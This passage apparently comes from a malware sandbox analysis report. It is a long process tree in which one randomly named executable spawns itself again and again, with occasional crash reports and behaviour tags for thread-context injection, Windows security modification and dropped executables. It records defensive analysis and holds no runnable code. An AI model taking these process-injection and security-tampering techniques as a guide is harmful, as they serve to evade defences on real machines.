    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:7056
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:4972
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:6800
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:1952
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:4116
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:6988
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:6268
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:588
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:7128
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:5160
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:1944
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:7268
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:7684
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:8108
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:6192
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:7872
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:8144
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:7528
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:5468
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:7344
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:7352
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:8316
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 8316 -s 164
      4⤵
      Program crash
      PID:8276
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:8980
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:4808
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:8204
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:8504
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:5808
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    - Suspicious use of SetThreadContext
    PID:4560
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:8616
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:8032
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:8888
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:2260
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:460
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:8616
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:8956
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:2260
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:6304
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:1128
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:7568
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:6056
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6056 -s 28
      4⤵
      Program crash
      PID:5508
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:4552
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:9060
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:976
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:8812
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:1260
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:5368
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:7060
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    - Windows security modification
    PID:7000
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:1956
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:7040
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:5436
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:6476
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:6112
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    - Executes dropped EXE
    PID:5752
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:8552
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:8728
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:8152
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:4984
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:7636
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:8564
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:7068
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:8272
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:3064
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:9208
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:6708
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:948
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:8412
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:7076
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:4524
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:5956
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    - Suspicious use of NtCreateProcessExOtherParentProcess
    PID:1296
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:8220
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:7664
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:1432
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:2628
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:7104
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:5008
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:3996
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:8692
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:9048
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:6776
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:7604
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    - Executes dropped EXE
    PID:2928
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:8940
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:9008
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:4260
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:6440
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:6288
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:4580
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:6868
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:7244
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:9196
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:4928
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:8820
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:10036
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:10224
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:4348
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:5268
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:4656
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:2652
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:3196
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:10340
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:10472
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 10472 -s 28
      4⤵
      Program crash
      PID:10544
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:10516
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:10744
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:11000
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:11176
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:10320
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:10512
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:10836
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:11044
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 11044 -s 28
      4⤵
      Program crash
      PID:10352
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:4300
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:8212
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:8752
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:5740
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:2908
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:2080
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:5088
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:6640
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:1632
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:10064
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:1540
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:10272
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:5008
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:10788
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:10752
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:9940
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:10068
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:11080
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:1672
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:3044
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:9252
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:5072
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:4132
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:10504
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:11168
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:10908
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:11236
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:9924
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:9688
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:6104
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:9464
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:11524
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:12040
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:11468
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:12124
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:12232
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:10508
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:11276
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
